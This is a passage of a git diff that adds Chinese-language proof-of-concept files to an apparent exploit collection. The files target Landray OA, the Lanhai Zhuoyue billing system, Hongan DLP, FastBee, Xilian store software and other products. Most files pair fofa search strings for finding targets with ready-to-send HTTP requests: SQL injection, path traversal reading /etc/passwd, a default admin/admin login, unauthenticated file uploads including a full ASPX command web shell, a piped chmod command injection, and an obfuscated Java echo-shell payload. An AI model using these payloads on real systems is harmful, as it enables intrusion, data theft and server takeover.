06c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d
+```
+## 漏洞复现
+执行POC，执行dir命令，回显目录
+![](./assets/20231026210940.png)
diff --git a/蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md b/蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md
new file mode 100644
index 0000000..f5f370f
--- /dev/null
+++ b/蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md
@@ -0,0 +1,57 @@
+## 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞
+
+## fofa
+```
+app="Landray-OA系统"
+
+```
+
+
+## poc
+直接访问路径，发现未授权文件上传 http://.com/sys/ui/sys_ui_component/sysUiComponent.do?method=upload
+![c9857f5370d4abd1547fa7cb1988a18a](https://github.com/wy876/POC/assets/139549762/ee361dae-cfa2-4eae-910f-501331731347)
+
+```
+POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
+Host: IP:PORT
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://.com/sys/ui/sys_ui_component/sysUiComponent.do?method=upload
+Content-Length: 474
+Content-Type: multipart/form-data; boundary=---------------------------15610248407689
+Cookie: SESSION=YmI0OGMyZDQtZDE0NC00MTQ2LWJmMzMtNWE5NDMwOTYxM2Ex
+DNT: 1
+Connection: close
+
+-----------------------------15610248407689
+Content-Disposition: form-data; name="file"; filename="test.zip"
+Content-Type: application/x-zip-compressed
+
+PKx3;x4;x14;
+-----------------------------15610248407689
+```
+## 漏洞复现
+创建component.ini文件，内容为：
+```
+id=2023
+name=check.txt
+```
+创建上传check.txt文件
+```
+1111
+```
+然后使用压缩软件，将两个文件压缩成一个压缩包，文件名check.zip
+
+
+最后上传即可。上传成功后访问路径/resource/ui-component/2023/check.txt
+
+
+## 漏洞来源
+```
+https://mp.weixin.qq.com/s/xhwmFuItG8ZoiuGrwR5bnw
+```
+
+
diff --git a/蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md b/蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md
new file mode 100644
index 0000000..3bf58aa
--- /dev/null
+++ b/蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞
+
+# 一、漏洞简介
+蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞
+
+# 二、影响版本
++ 蓝海卓越 计费管理系统
+
+# 三、资产测绘
++ fofa`title=="蓝海卓越计费管理系统"`
++ 特征
+
+![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/ILj6pxbgPBiUNxBM/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-994839.png)
+
+# 四、漏洞复现
+```plain
+GET /agent_setstate.php?id=1+AND+(SELECT+4964+FROM+(SELECT(if(length(database())=6,sleep(3),1)))uQqn) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
+Content-Length: 161
+```
+
+![1716367639326-aee08e08-c3d0-4b5d-ac2d-e77844bafdce.png](./img/ILj6pxbgPBiUNxBM/1716367639326-aee08e08-c3d0-4b5d-ac2d-e77844bafdce-351977.png)
+
+
+
+
+
+> 更新: 2024-05-23 12:33:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgkwcrdalag9xge0>
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统debug存在远程命令执行漏洞.md b/蓝海卓越计费管理系统debug存在远程命令执行漏洞.md
new file mode 100644
index 0000000..c449c0e
--- /dev/null
+++ b/蓝海卓越计费管理系统debug存在远程命令执行漏洞.md
@@ -0,0 +1,38 @@
+# 蓝海卓越 计费管理系统debug存在远程命令执行漏洞
+
+# 一、漏洞简介
+蓝海卓越 计费管理系debug存在远程命令执行漏洞，导致攻击者可以远程命令执行
+
+# 二、影响版本
++ 蓝海卓越 计费管理系统
+
+# 三、资产测绘
++ fofa`title=="蓝海卓越计费管理系统"`
++ 特征
+
+![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/v8vbMQIfX0kONNUn/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-099589.png)
+
+# 四、漏洞复现
+```plain
+POST /debug.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 6
+Connection: close
+Cookie: PHPSESSID=6jvq6prlaoemtc00r7a876ntb4
+Priority: u=1
+
+cmd=id
+```
+
+![1716136252700-9872c760-028e-41b3-b57e-53c461873e34.png](./img/v8vbMQIfX0kONNUn/1716136252700-9872c760-028e-41b3-b57e-53c461873e34-607611.png)
+
+
+
+> 更新: 2024-05-23 12:33:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uz5gelsecrff83dp>
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md b/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md
new file mode 100644
index 0000000..258816e
--- /dev/null
+++ b/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 蓝海卓越 计费管理系统loaduser存在SQL注入漏洞
+
+# 一、漏洞简介
+蓝海卓越计费管理系统loaduser存在SQL注入漏洞
+
+# 二、影响版本
++ 蓝海卓越 计费管理系统
+
+# 三、资产测绘
++ fofa`title=="蓝海卓越计费管理系统"`
++ 特征
+
+![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/ZuWWFOBczG1cMdE2/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-863677.png)
+
+# 四、漏洞复现
+```plain
+/ajax/loaduser.php?UserName=1
+```
+
+直接sqlmap跑
+
+![1716368373510-b0b02332-cdaa-484d-9bce-f89aae5681d2.png](./img/ZuWWFOBczG1cMdE2/1716368373510-b0b02332-cdaa-484d-9bce-f89aae5681d2-215575.png)
+
+
+
+> 更新: 2024-05-23 12:33:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dp8fzx7t8uhgpsam>
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md b/蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md
new file mode 100644
index 0000000..dce0043
--- /dev/null
+++ b/蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md
@@ -0,0 +1,56 @@
+# 蓝海卓越 计费管理系统picUpLoad存在任意文件删除漏洞
+
+# 一、漏洞简介
+蓝海卓越 计费管理系统picUpLoad存在任意文件删除漏洞
+
+# 二、影响版本
++ 蓝海卓越 计费管理系统
+
+# 三、资产测绘
++ fofa`title=="蓝海卓越计费管理系统"`
++ 特征
+
+![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/oXQ_3ojiaYdjzEDT/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-714250.png)
+
+# 四、漏洞复现
+```plain
+POST /inc/picUpFile.php?upFileFoler=&upFileID=&viewID= HTTP/1.1
+Host: 
+Content-Length: 1447494
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryehA9evlvumScbjSw
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 SE 2.X MetaSr 1.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=lp91fvnja6f987dj7jmkjh5601
+Connection: close
+
+------WebKitFormBoundaryehA9evlvumScbjSw
+Content-Disposition: form-data; name="oldFileName"
+
+../../../../../usr/local/usr-gui/test.php
+------WebKitFormBoundaryehA9evlvumScbjSw
+Content-Disposition: form-data; name="file"; filename="c.jpg"
+Content-Type: image/jpeg
+
+‰PNG
+
+
+```
+
+删除前
+
+![1716390398206-8c468003-c696-4598-8722-1bf12f77f597.png](./img/oXQ_3ojiaYdjzEDT/1716390398206-8c468003-c696-4598-8722-1bf12f77f597-977713.png)
+
+![1716390672971-2ed1b251-e00c-421c-8d55-b9d57b0387b5.png](./img/oXQ_3ojiaYdjzEDT/1716390672971-2ed1b251-e00c-421c-8d55-b9d57b0387b5-466649.png)
+
+删除后
+
+![1716390648320-9877848d-e0e0-4eb9-8161-04ed283e68ab.png](./img/oXQ_3ojiaYdjzEDT/1716390648320-9877848d-e0e0-4eb9-8161-04ed283e68ab-968201.png)
+
+
+
+> 更新: 2024-05-23 12:33:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mcsdegx6gomcebd8>
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统任意文件读取漏洞.md b/蓝海卓越计费管理系统任意文件读取漏洞.md
new file mode 100644
index 0000000..db9a898
--- /dev/null
+++ b/蓝海卓越计费管理系统任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 蓝海卓越计费管理系统任意文件读取漏洞
+
+# 一、漏洞简介
+蓝海卓越计费管理系统存在任意文件读取漏洞，攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件。
+
+# 二、影响版本
++ 蓝海卓越计费管理系统
+
+# 三、资产测绘
++ hunter`web.title=="蓝海卓越计费管理系统"`
++ 登录页面
+
+![1693579717927-cbd94d05-0588-4dda-9e39-b1c7c482d113.png](./img/v_IBCSqew1UGaRIV/1693579717927-cbd94d05-0588-4dda-9e39-b1c7c482d113-430414.png)
+
+# 四、漏洞复现
+```java
+GET /download.php?file=../../../../../etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=j19v1fshs6s3cvqff0k4l0kjn5
+Upgrade-Insecure-Requests: 1
+```
+
+![1693579897849-1a707b06-bdb4-4e5f-853f-201ac2af36ad.png](./img/v_IBCSqew1UGaRIV/1693579897849-1a707b06-bdb4-4e5f-853f-201ac2af36ad-850295.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qrur2mnozzvxgaw8>
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统多漏洞导致getshell.md b/蓝海卓越计费管理系统多漏洞导致getshell.md
new file mode 100644
index 0000000..5a12c87
--- /dev/null
+++ b/蓝海卓越计费管理系统多漏洞导致getshell.md
@@ -0,0 +1,110 @@
+# 蓝海卓越计费管理系统多漏洞导致getshell
+
+# 一、漏洞简介
+ 蓝海卓越认证计费管理系统是一套以实现网络运营为基础，增强全局安全为中心，提高管理效率为目的的网络安全运营管理系统，提供“高安全、可运营、易管理”的运营管理体验，基于标准的RADIUS协议开发，它不仅支持PPPOE和WEB认证计费，还支持802.1X接入控制技术，与其他厂商支持相应标准的产品兼容，结合蓝海卓越的PPPOE服务器网关，可提供更加丰富的功能。，另外，友好的Web访问管理的方式，为用户提供更好用、易用的方式，更贴心的使用形式。蓝海卓越计费管理系统多漏洞导致getshell
+
+# 二、影响版本
++ 蓝海卓越 计费管理系统
+
+# 三、资产测绘
++ fofa`title=="蓝海卓越计费管理系统"`
++ 特征
+
+![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/qe1tkFLp9GezjB1g/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-253370.png)
+
+# 四、漏洞复现
+```plain
+/ajax/loaduser.php?UserName=1
+```
+
+通过注入跑出账号密码
+
+![1716389345421-9e38d8dd-0c85-4c42-ac5d-d9fb1116d3a3.png](./img/qe1tkFLp9GezjB1g/1716389345421-9e38d8dd-0c85-4c42-ac5d-d9fb1116d3a3-823276.png)
+
+使用MD5解密出密码后登录系统
+
+![1716389833186-8bbff4b6-dff5-46f8-855d-a6a901787035.png](./img/qe1tkFLp9GezjB1g/1716389833186-8bbff4b6-dff5-46f8-855d-a6a901787035-819521.png)
+
+![1716389848399-cb2cc634-200c-4818-be59-4381433c5a6b.png](./img/qe1tkFLp9GezjB1g/1716389848399-cb2cc634-200c-4818-be59-4381433c5a6b-844579.png)
+
+点击PORTAL模板下面的PORTAL模板管理，选择上传模板
+
+![1716390460832-fd0d98ce-26e8-41ea-973e-95e1b6ae9522.png](./img/qe1tkFLp9GezjB1g/1716390460832-fd0d98ce-26e8-41ea-973e-95e1b6ae9522-847896.png)
+
+[root.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/29512878/1716438804359-a43f8695-df0c-4b28-83bc-e23064072257.zip)
+
+由于新版本系统的模板位置不在web路径下，所以需要穿越模板路径
+
+Web绝对路径：
+
+```plain
+/usr/local/usr-gui/
+```
+
+模板路径：
+
+```plain
+/mnt/mysql/usr/local/portal/themes/20240519093115_xxx/
+```
+
+制作一个如下的压缩包：
+
+![1716389926031-814570a6-da10-4a06-ab0b-d76d6c891411.png](./img/qe1tkFLp9GezjB1g/1716389926031-814570a6-da10-4a06-ab0b-d76d6c891411-903276.png)
+
+test.php内容为：字符编码必须为Unix(LF)
+
+```plain
+#!/bin/php
+<?php
+phpinfo();
+?>
+```
+
+![1716390048945-ca864ffe-6e01-4bb6-8592-e78b6a92518e.png](./img/qe1tkFLp9GezjB1g/1716390048945-ca864ffe-6e01-4bb6-8592-e78b6a92518e-619177.png)
+
+
+
+上传zip压缩包
+
+![1716390233650-ab77d4c6-3b4f-47a0-a7ae-3118efd6819f.png](./img/qe1tkFLp9GezjB1g/1716390233650-ab77d4c6-3b4f-47a0-a7ae-3118efd6819f-134490.png)
+
+Shell位置为：
+
+```plain
+/test.php
+```
+
+但是访问时会提示：
+
+![1716390275360-c5689377-8edc-4977-a8dd-7f3449abc878.png](./img/qe1tkFLp9GezjB1g/1716390275360-c5689377-8edc-4977-a8dd-7f3449abc878-072747.png)
+
+接下来就需要使用后台命令执行漏洞进行权限赋予：
+
+```plain
+GET /ajax_check.php?portaltheme_del_id=4&portaltheme_del_dir=%2Fmnt%2Fmysql%2Fusr%2Flocal%2Fportal%2Fthemes%2F20210519093903_738%2F|chmod+755+/usr/local/usr-gui/test.php HTTP/1.1
+Host: 
+Accept: */*
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
+Referer: http://124.114.151.106:8880/portaltheme_list.php
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: mylang=zh_s; PHPSESSID=lp91fvnja6f987dj7jmkjh5601
+Connection: close
+
+```
+
+![1716390344536-d72391d6-2178-4dfa-ac0e-72962047e530.png](./img/qe1tkFLp9GezjB1g/1716390344536-d72391d6-2178-4dfa-ac0e-72962047e530-418615.png)
+
+之后再次访问
+
+```plain
+/test.php
+```
+
+![1716390374521-ebe7f986-e300-4ac6-8b2a-d9e26cf8f674.png](./img/qe1tkFLp9GezjB1g/1716390374521-ebe7f986-e300-4ac6-8b2a-d9e26cf8f674-878726.png)
+
+
+
+> 更新: 2024-05-23 12:33:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dbwc8rx9kq4t14eb>
\ No newline at end of file
diff --git a/蓝海卓越计费管理系统存在弱口令漏洞.md b/蓝海卓越计费管理系统存在弱口令漏洞.md
new file mode 100644
index 0000000..cef99cd
--- /dev/null
+++ b/蓝海卓越计费管理系统存在弱口令漏洞.md
@@ -0,0 +1,25 @@
+# 蓝海卓越计费管理系统存在弱口令漏洞
+
+# 一、漏洞简介
+蓝海卓越计费管理系统存在弱口令漏洞
+
+# 二、影响版本
++ 蓝海卓越计费管理系统
+
+# 三、资产测绘
++ fofa`title=="蓝海卓越计费管理系统"`
++ 特征
+
+![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/pHk6xkjRFchHBF2G/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-282120.png)
+
+# 四、漏洞复现
+```plain
+admin/admin
+```
+
+![1716367345268-dc069ed1-5306-4921-adc4-9681586da950.png](./img/pHk6xkjRFchHBF2G/1716367345268-dc069ed1-5306-4921-adc4-9681586da950-239153.png)
+
+
+
+> 更新: 2024-05-23 12:33:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rty62bbg592gggir>
\ No newline at end of file
diff --git a/虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md b/虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md
new file mode 100644
index 0000000..cc0813f
--- /dev/null
+++ b/虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md
@@ -0,0 +1,42 @@
+# 虚拟币买卖USDT场外交易所upload.do存在任意文件上传
+
+虚拟币买卖USDT场外交易所由于在鉴权方面存在疏漏，导致了可未授权访问，从而通过upload.do接口进行任意文件上传。
+
+## fofa
+
+```javascript
+body="/static/weui/css/wkb.css"
+```
+
+## poc
+
+```javascript
+POST /member/index/upload.do HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Connection: keep-alive
+Content-Length: 197
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZcxuMaQ4IflRnJgy
+Cookie: Hm_lvt_f4b3788b2247dd149fb7fdffe8aece79=1717334200; _ga=GA1.1.64233863.1717334200; PHPSESSID=8t16e4ahe761qikg272s6jhsi0
+Host: 127.0.0.1:81
+Origin: http://127.0.0.1:81
+Referer: http://127.0.0.1:81/member/index/upload.do
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+
+------WebKitFormBoundary03rNBzFMIytvpWhy
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundary03rNBzFMIytvpWhy--
+```
+路径返回包中
diff --git a/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md b/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..acb8e22
--- /dev/null
+++ b/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞
+
+虹安Heimdall DLP数据泄漏防护系统 pushSetup.do 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="userReg/initUserReg.do"
+```
+
+## poc
+```javascript
+POST /dlp/userReg/pushSetup.do HTTP/1.1
+Host: 
+Priority: u=4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+setupName={{urlescape(1' AND (SELECT 6789 FROM (SELECT(SLEEP(5)))nxdq) AND 'vpUG'='vpUG)}}
+```
+
+![image-20241227223225696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272232761.png)
\ No newline at end of file
diff --git a/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md b/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md
new file mode 100644
index 0000000..4b890d5
--- /dev/null
+++ b/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md
@@ -0,0 +1,18 @@
+# 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞
+
+蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+"fastbee"
+```
+
+## poc
+
+```javascript
+GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
+Host:
+Accept-Encoding: gzip, deflate, br
+```
+
diff --git a/西联软件移动门店管理系统treamToFile文件上传漏洞.md b/西联软件移动门店管理系统treamToFile文件上传漏洞.md
new file mode 100644
index 0000000..71359c4
--- /dev/null
+++ b/西联软件移动门店管理系统treamToFile文件上传漏洞.md
@@ -0,0 +1,59 @@
+# 西联软件移动门店管理系统treamToFile文件上传漏洞
+
+西联软件-移动门店管理系统 StreamToFile 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+```javascript
+body="西联软件提供云计算服务"
+```
+
+## poc
+```javascript
+POST /api/UploadDB/StreamToFile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Connection: close
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="organ"
+
+qwert
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="devid"
+
+yuiop
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="files";filename="1.aspx"
+Content-Type: image/png
+
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![image-20241227221622454](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272216534.png)
+
+文件路径
+
+```
+/Files/DB/qwert_yuiop.aspx?cmd=dir
+```
+
diff --git a/西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md b/西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md
new file mode 100644
index 0000000..c094f1c
--- /dev/null
+++ b/西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md
@@ -0,0 +1,47 @@
+# 西软云XMS FoxLookupInvoker接口存在反序列化漏洞
+
+# 一、漏洞简介
+西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四，五星级中高端酒店提供灵活、高度整合酒店业务，助力酒店智能转型升级。2020的开年突变，对酒店行业来讲，无疑是天降横祸。覆巢之下，焉有完卵，对酒店管理系统企业来说，则是增量市场的红利几乎消失，所有品牌都得在存量市场里搏杀，生存和创新，是2020年的头号命题。<font style="color:rgba(0, 0, 0, 0.9);">西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞，未经身份认证的攻击者可利用此漏洞执行任意代码，获取服务器权限。</font>
+
+# 二、影响版本
++ 西软云XMS
+
+# 三、资产测绘
++ fofa`app="shiji-西软云XMS"`
++ 特征
+
+![1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8.png](./img/zWTMpvX2S5KgVWD4/1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8-052359.png)
+
+# 四、漏洞复现
+1. 生成`CommonsBeanutils183NOCC`回显链
+
+[ysoserial-0.0.6-SNAPSHOT-all.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1713623246544-1ecb25a1-5dcc-450d-9ea1-067408bc9cc8.jar)
+
+```plain
+java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils183NOCC "CLASS:TomcatCmdEcho" | base64
+```
+
+```plain
